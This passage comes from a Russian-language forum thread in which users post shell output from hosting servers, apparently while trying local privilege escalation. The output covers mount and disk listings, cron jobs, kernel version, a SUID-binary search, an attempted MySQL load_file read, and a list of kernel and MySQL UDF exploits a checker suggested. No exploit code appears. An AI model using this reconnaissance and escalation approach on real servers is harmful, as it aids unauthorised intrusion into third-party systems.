    -rwxr-xr-x  1 root root 72184 2012-11-12 18:58:05.000000000 +0200 klibc-2xtYrByCrj5OEwaInv4tMSjej98.so
    lrwxrwxrwx  1 root root    17 2013-03-01 15:55:02.000000000 +0200 libip4tc.so.0 -> libip4tc.so.0.1.0
    -rw-r--r--  1 root root 31384 2013-03-01 15:55:04.000000000 +0200 libip4tc.so.0.1.0
    lrwxrwxrwx  1 root root    17 2013-03-01 15:55:02.000000000 +0200 libip6tc.so.0 -> libip6tc.so.0.1.0
    -rw-r--r--  1 root root 31448 2013-03-01 15:55:04.000000000 +0200 libip6tc.so.0.1.0
    lrwxrwxrwx  1 root root    15 2013-03-01 15:55:02.000000000 +0200 libipq.so.0 -> libipq.so.0.0.0
    -rw-r--r--  1 root root 10544 2013-03-01 15:55:04.000000000 +0200 libipq.so.0.0.0
    lrwxrwxrwx  1 root root    16 2013-03-01 15:55:02.000000000 +0200 libiptc.so.0 -> libiptc.so.0.0.0
    -rw-r--r--  1 root root  5928 2013-03-01 15:55:04.000000000 +0200 libiptc.so.0.0.0
    lrwxrwxrwx  1 root root    19 2013-03-01 15:55:02.000000000 +0200 libxtables.so.7 -> libxtables.so.7.0.0
    -rw-r--r--  1 root root 47824 2013-03-01 15:55:04.000000000 +0200 libxtables.so.7.0.0
    drwxr-xr-x  3 root root  4096 2015-05-12 13:03:13.911433001 +0300 lsb
    drwxr-xr-x  2 root root  4096 2015-05-12 13:03:25.155433001 +0300 modprobe.d
    drwxr-xr-x  3 root root  4096 2015-05-12 13:03:59.007433001 +0300 modules
    drwxr-xr-x  3 root root  4096 2015-05-12 13:03:27.079433001 +0300 systemd
    drwxr-xr-x 15 root root  4096 2015-05-12 13:03:06.719433001 +0300 terminfo
    drwxr-xr-x  5 root root  4096 2015-05-12 13:03:27.463433001 +0300 udev
    drwxr-xr-x  4 root root 12288 2015-05-29 10:37:18.893494371 +0300 x86_64-linux-gnu
    drwxr-xr-x  2 root root  4096 2015-05-12 13:03:24.923433001 +0300 xtables
    :/var/www/user/data $ mount
    sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
    proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
    udev on /dev type devtmpfs (rw,relatime,size=10240k,nr_inodes=746519,mode=755)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
    tmpfs on /run type tmpfs (rw,nosuid,noexec,relatime,size=598420k,mode=755)
    /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470 on / type ext4 (rw,relatime,errors=remount-ro,user_xattr,barrier=1,data=ordered,usrquota,grpquota)
    tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
    tmpfs on /run/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=1301280k)
    /dev/vda1 on /boot type ext2 (rw,relatime,errors=continue)
    rpc_pipefs on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw,relatime)
    :/var/www/user/data $ df -h
    Filesystem                                              Size  Used Avail Use% Mounted on
    rootfs                                                   58G   26G   29G  48% /
    udev                                                     10M     0   10M   0% /dev
    tmpfs                                                   585M  232K  585M   1% /run
    /dev/disk/by-uuid/8038203e-749a-4f44-bc0c-032c3bb78470   58G   26G   29G  48% /
    tmpfs                                                   5.0M     0  5.0M   0% /run/lock
    tmpfs                                                   1.3G     0  1.3G   0% /run/shm
    /dev/vda1                                                89M   17M   67M  21% /boot
    :/var/www/user/data $ cat /etc/issue
    Debian GNU/Linux 7 \n \l
    :/var/www/user/data $ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user  command
    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    :/var/www/user/data $ ls -la /etc/cron.d
    total 20
    drwxr-xr-x  2 root root 4096 Jun 15 13:23 .
    drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
    -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
    -rw-r--r--  1 root root  254 Jun 13  2012 awstats
    -rw-r--r--  1 root root  510 Mar 25 10:47 php5
    :/var/www/user/data $ ls -la /etc/cron.hourly
    total 12
    drwxr-xr-x  2 root root 4096 May 12 13:03 .
    drwxr-xr-x 93 root root 4096 Aug 28 09:27 ..
    -rw-r--r--  1 root root  102 Jul  4  2012 .placeholder
    :/var/www/user/data $ la -la /etc/cron.monthly
    sh: 1: la: not found
    :/var/www/user/data $ la -la /etc/cron.weekly
    sh: 1: la: not found
    :/var/www/user/data $ cat /etc/cron.hourly/*
    cat: /etc/cron.hourly/*: No such file or directory
    :/var/www/user/data $ cat /etc/cron.monthly/*
    cat: /etc/cron.monthly/*: No such file or directory
    :/var/www/user/data $ cat /etc/cron.weekly/*
    #!/bin/sh
    #
    # man-db cron weekly
    #
    # Rebuilds the manual page database: makes sure /var/cache/man exists and
    # then starts /usr/bin/mandb under the `man` account via start-stop-daemon.
    # The /etc/crontab shown in this post runs /etc/cron.weekly as root, so the
    # --chuid below is what keeps mandb itself from running as root.
    
    # Stop at the first command that fails outside a condition.
    set -e
    
    # Extra start-stop-daemon arguments; stays empty unless both checks pass.
    iosched_idle=
    # Don't try to change I/O priority in a vserver or OpenVZ.
    # The test passes when /proc/self/status has no envID/VxID line carrying a
    # non-zero digit, and either /proc/vz is absent or /proc/bc is present.
    if ! egrep -q '(envID|VxID):.*[1-9]' /proc/self/status && \
       ([ ! -d /proc/vz ] || [ -d /proc/bc ]); then
        # --iosched is requested only when the installed dpkg is >= 1.15.0
        # (presumably because start-stop-daemon ships with dpkg -- confirm).
        dpkg_version="$(dpkg-query -W -f '${Version}' dpkg 2>/dev/null)"
        if dpkg --compare-versions "$dpkg_version" ge 1.15.0; then
            iosched_idle='--iosched idle'
        fi
    fi
    
    if ! [ -d /var/cache/man ]; then
        # Recover from deletion, per FHS.
        mkdir -p /var/cache/man
        # `|| true` keeps a failed chown from aborting the job under set -e.
        chown man:root /var/cache/man || true
        # 2755 = setgid directory, writable by its owner only.
        chmod 2755 /var/cache/man
    fi
    
    # regenerate man database
    if [ -x /usr/bin/mandb ]; then
        # --pidfile /dev/null so it always starts; mandb isn't really a daemon,
        # but we want to start it like one.
        # $iosched_idle is left unquoted on purpose: it must expand to two
        # separate arguments, or to nothing at all when it is empty.
        start-stop-daemon --start --pidfile /dev/null \
                          --startas /usr/bin/mandb --oknodo --chuid man \
                          $iosched_idle \
                          -- --quiet
    fi
    
    exit 0
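    #!/bin/sh
    #
    # Weekly cron job that runs rkhunter's --versioncheck and --update and
    # mails the outcome through /usr/sbin/sendmail.
    #
    # CRON_DB_UPDATE, DB_UPDATE_EMAIL and REPORT_EMAIL are not set here; they
    # are expected to come from /etc/default/rkhunter (sourced below).
    # That file is executed as shell code with the privileges of this job, so
    # it has to stay writable by root only.
    
    RKHUNTER=/usr/bin/rkhunter
    
    # Nothing to do when rkhunter is not installed.
    test -x "$RKHUNTER" || exit 0
    
    # source our config
    . /etc/default/rkhunter
    
    case "$CRON_DB_UPDATE" in
            [YyTt]*)
    
                    # The update needs one of these download tools.
                    if [ ! -x /usr/bin/wget ] && [ ! -x /usr/bin/curl ] && [ ! -x /usr/bin/links ] && \
                       [ ! -x /usr/bin/elinks ] && [ ! -x /usr/bin/lynx ]; then
                         echo "No tool with which to download rkhunter updates was found on your system. Please install wget, curl, (e)links or lynx"
                         exit 1
                    fi
    
                    # mktemp gives an unpredictable name; every later use is
                    # quoted so the path is always passed as a single word.
                    OUTFILE=$(mktemp) || exit 1
    
                    case "$DB_UPDATE_EMAIL" in
                        [YyTt]*)
                            # Always mail the full output of both runs.
                            # $REPORT_EMAIL is left unquoted in the sendmail
                            # calls: it may hold several recipients -- TODO
                            # confirm against /etc/default/rkhunter.
                            (
                            echo "Subject: [rkhunter] $(hostname -f) - Weekly database update"
                            echo "To: $REPORT_EMAIL"
                            echo ""
                            "$RKHUNTER" --versioncheck --nocolors --appendlog
                            "$RKHUNTER" --update --nocolors --appendlog
                            ) | /usr/sbin/sendmail $REPORT_EMAIL
                        ;;
                        *)
                            # Quiet mode: keep stderr only, in the temp file.
                            "$RKHUNTER" --versioncheck --appendlog 1>/dev/null 2>"$OUTFILE"
                            "$RKHUNTER" --update --appendlog 1>/dev/null 2>>"$OUTFILE"
                        ;;
                    esac
    
                    # Mail only when the quiet runs wrote something to stderr.
                    if [ -s "$OUTFILE" ]; then
                        (
                        echo "Subject: [rkhunter] $(hostname -f) - Weekly rkhunter database update"
                        echo "To: $REPORT_EMAIL"
                        echo ""
                        cat "$OUTFILE"
                        ) | /usr/sbin/sendmail $REPORT_EMAIL
                    fi
                    rm -f "$OUTFILE"
            ;;
    
            *)
                    # Updates from cron are disabled in the config.
                    exit 0
            ;;
    esac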
    :/var/www/user/data $ cat /proc/version
    Linux version 3.2.0-4-amd64 ([email protected]) (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.68-1+deb7u1
    :/var/www/user/data $ cat /proc/sys/vm/mmap_min_addr
    65536
    :/var/www/user/data $ pwd
    /var/www/user/data
    :/var/www/user/data $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    :/var/www/user/data $ id
    uid=500(user) gid=500(user) groups=500(user),1000(mgrsecure)
    :/var/www/user/data $ 



    пробовал читать файлы из mysql но много не прочитал
    select load_file('');

    И из эксплоитов пробовал, (чекер показал)
    - Kernel ia32syscall Emulation Privilege Escalation Language=c
    - Sendpage Local Privilege Escalation Language=ruby**
    - CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) Language=c
    - MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit Language=c
    - open-time Capability file_ns_capable() Privilege Escalation Language=c
    - open-time Capability file_ns_capable() - Privilege Escalation Vulnerability Language=c
     
    #596 Valer4ik, 14 Sep 2015
    Last edited by a moderator: 14 Sep 2015
  17. ghost8

  18. Valer4ik

  19. Bezlishke

    Такие дела. Пробовал связку, но меня послало.

    Code:
    
    $ uname -a
    Linux fortuna.timeweb.ru 3.10.82-timeweb #1 SMP Fri Jul 3 10:11:34 MSK 2015 x86_64 x86_64 x86_64 GNU/Linux
    $ ls -la /boot
    total 153444
    drwxr-xr-x  3 root root     4096 Oct  8 06:28 .
    drwxr-xr-x 28 root root     4096 Jul 21 06:26 ..
    -rw-r--r--  1 root root  3210565 Aug 26  2014 System.map-3.10.53-timeweb
    -rw-r--r--  1 root root  3210844 Oct 16  2014 System.map-3.10.58-timeweb
    -rw-r--r--  1 root root  3213729 Mar  3  2015 System.map-3.10.70-timeweb
    -rw-r--r--  1 root root  3213988 Jul  3 10:49 System.map-3.10.82-timeweb
    -rw-r--r--  1 root root  3214012 Oct  7 13:05 System.map-3.10.90-timeweb
    -rw-r--r--  1 root root  2911687 May 20  2013 System.map-3.2.45-timeweb
    -rw-r--r--  1 root root   132942 Aug 26  2014 config-3.10.53-timeweb
    -rw-r--r--  1 root root   133622 Oct 16  2014 config-3.10.58-timeweb
    -rw-r--r--  1 root root   134094 Mar  3  2015 config-3.10.70-timeweb
    -rw-r--r--  1 root root   134094 Jul  3 10:00 config-3.10.82-timeweb
    -rw-r--r--  1 root root   134094 Oct  7 12:17 config-3.10.90-timeweb
    -rw-r--r--  1 root root   129458 May 20  2013 config-3.2.45-timeweb
    drwxr-xr-x  3 root root    12288 Oct  8 06:28 grub
    -rw-r--r--  1 root root 16856878 Sep 16  2014 initrd.img-3.10.53-timeweb
    -rw-r--r--  1 root root 17273047 Feb 18  2015 initrd.img-3.10.58-timeweb
    -rw-r--r--  1 root root 17273539 Mar 18  2015 initrd.img-3.10.70-timeweb
    -rw-r--r--  1 root root 17273177 Sep 29 06:25 initrd.img-3.10.82-timeweb
    -rw-r--r--  1 root root 17272293 Oct  8 06:28 initrd.img-3.10.90-timeweb
    -rw-r--r--  1 root root 15767803 Sep 18  2013 initrd.img-3.2.45-timeweb
    -rw-r--r--  1 root root   176764 Nov 27  2011 memtest86+.bin
    -rw-r--r--  1 root root   178944 Nov 27  2011 memtest86+_multiboot.bin
    -rw-r--r--  1 root root  5939488 Aug 26  2014 vmlinuz-3.10.53-timeweb
    -rw-r--r--  1 root root  5941120 Oct 16  2014 vmlinuz-3.10.58-timeweb
    -rw-r--r--  1 root root  5948224 Mar  3  2015 vmlinuz-3.10.70-timeweb
    -rw-r--r--  1 root root  5949952 Jul  3 10:49 vmlinuz-3.10.82-timeweb
    -rw-r--r--  1 root root  5951264 Oct  7 13:05 vmlinuz-3.10.90-timeweb
    -rw-r--r--  1 root root  5480816 May 20  2013 vmlinuz-3.2.45-timeweb
    $ lls -la --full-time /lib64
    
    $ lls -la --full-time /lib
    
    $ mount
    /dev/sda1 on / type ext4 (rw,errors=remount-ro)
    proc on /proc type proc (rw,noexec,nosuid,nodev)
    sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
    none on /sys/fs/fuse/connections type fusectl (rw)
    none on /sys/kernel/debug type debugfs (rw)
    none on /sys/kernel/security type securityfs (rw)
    udev on /dev type devtmpfs (rw,mode=0755)
    devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=0620)
    none on /tmp type tmpfs (rw,noexec,nosuid,nodev,noatime,size=4g)
    tmpfs on /run type tmpfs (rw,noexec,nosuid,size=10%,mode=0755)
    none on /run/lock type tmpfs (rw,noexec,nosuid,nodev,size=5242880)
    none on /run/shm type tmpfs (rw,nosuid,nodev)
    none on /var/spool/exim4 type tmpfs (rw,noexec,nosuid,nodev,noatime,size=1g)
    /dev/drbd0 on /home type ext4 (rw,nosuid,noatime,nodiratime,usrjquota=aquota.user,jqfmt=vfsv0,usrquota,discard,_netdev)
    //172.16.0.30/homes on /mnt/backup type cifs (rw,noexec,nosuid,nodev)
    $ df -h
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1        46G   24G   20G  55% /
    udev             32G   12K   32G   1% /dev
    none            4.0G  579M  3.5G  15% /tmp
    tmpfs           6.3G  336K  6.3G   1% /run
    none            5.0M     0  5.0M   0% /run/lock
    none             32G   24K   32G   1% /run/shm
    none            1.0G  7.7M 1017M   1% /var/spool/exim4
    /dev/drbd0      1.5T  1.3T  170G  88% /home
    $ cat /etc/issue
    Ubuntu 12.04.5 LTS \n \l
    
    $ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    17 *    * * *    root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    $ ls -la cron.d
    total 36
    drwxr-xr-x   2 root root  4096 Jul 16  2014 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    -rw-r--r--   1 root root   589 Apr 11  2013 mdadm
    -rw-r--r--   1 root root   499 Aug  9  2013 php5
    -rw-r-----   1 root root   116 Jul 16  2014 puppet_agent_restart
    -rw-r--r--   1 root root   396 Dec 16  2011 sysstat
    $ ls -la cron.hourly
    total 20
    drwxr-xr-x   2 root root  4096 Aug 22  2013 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    $ ls -la cron.monthly
    total 28
    drwxr-xr-x   2 root root  4096 Aug 23  2013 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    -rwxr-xr-x   1 root root  1281 May  6  2011 acct
    -rwxr-xr-x   1 root root   534 Mar  8  2012 debsums
    $ ls -la cron.weekly
    total 32
    drwxr-xr-x   2 root root  4096 Oct 10  2014 .
    drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
    -rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
    -rwxr-xr-x   1 root root   730 Dec 31  2011 apt-xapian-index
    -rwxr-xr-x   1 root root   533 Mar  8  2012 debsums
    -rwxr-xr-x   1 root root   907 Dec 28  2012 man-db
    $ cat /proc/version
    Linux version 3.10.82-timeweb ([email protected]) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #1 SMP Fri Jul 3 10:11:34 MSK 2015
    $ cat /proc/sys/vm/mmap_min_addr
    65536
    $ pwd
    /etc
    $ ls -la /usr/bin/staprun
    
    $ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-xr-x 1 root root 31304 Mar  2  2012 /bin/fusermount
    -rwsr-xr-x 1 root root 35712 Nov  8  2011 /bin/ping
    -rwsr-xr-x 1 root root 36832 Sep 13  2012 /bin/su
    -rwsr-xr-x 1 root root 40256 Nov  8  2011 /bin/ping6
    -rwsr-xr-x 1 root root 94792 Jun 18  2014 /bin/mount
    -rwsr-xr-x 1 root root 69096 Jun 18  2014 /bin/umount
    -rwsr-xr-x 1 root root 32232 May 17  2013 /sbin/mount.cifs
    -rwsr-xr-x 1 root root 62400 Jul 29  2011 /usr/bin/mtr
    -rwsr-xr-x 1 root root 37096 Sep 13  2012 /usr/bin/chsh
    -rwsr-xr-x 2 root root 71280 Mar 12  2015 /usr/bin/sudoedit
    -rwsr-xr-x 2 root root 71280 Mar 12  2015 /usr/bin/sudo
    -rwsr-xr-x 1 root root 42824 Sep 13  2012 /usr/bin/passwd
    -rwsr-xr-x 1 root root 41832 Sep 13  2012 /usr/bin/chfn
    -rwsr-sr-x 1 daemon daemon 47928 Oct 25  2011 /usr/bin/at
    -rwsr-xr-x 1 root root 35712 Nov  8  2009 /usr/bin/tcptraceroute.mt
    -rwsr-xr-x 1 root root 32352 Sep 13  2012 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 63848 Sep 13  2012 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 18912 Nov  8  2011 /usr/bin/traceroute6.iputils
    -rwsr-xr-- 1 root dip 321552 Apr 21 20:33 /usr/sbin/pppd
    -r-sr-x--- 1 root customers 940632 Dec 28  2012 /usr/sbin/exim4
    -rwsr-x--- 1 _lldpd adm 55640 Nov 27  2011 /usr/sbin/lldpctl
    -rwsr-sr-x 1 libuuid libuuid 18856 Jun 18  2014 /usr/sbin/uuidd
    -rwsr-xr-x 1 root root 10592 Mar 26  2015 /usr/lib/pt_chown
    -rwsr-xr-- 1 root messagebus 292944 Nov 25  2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 10408 Dec 13  2011 /usr/lib/eject/dmcrypt-get-device
    -rwsr-xr-x 1 root root 240984 Aug 18 05:13 /usr/lib/openssh/ssh-keysign
    $
     
  20. foma9999

    Спасибо!
    Все равно ошибка та же...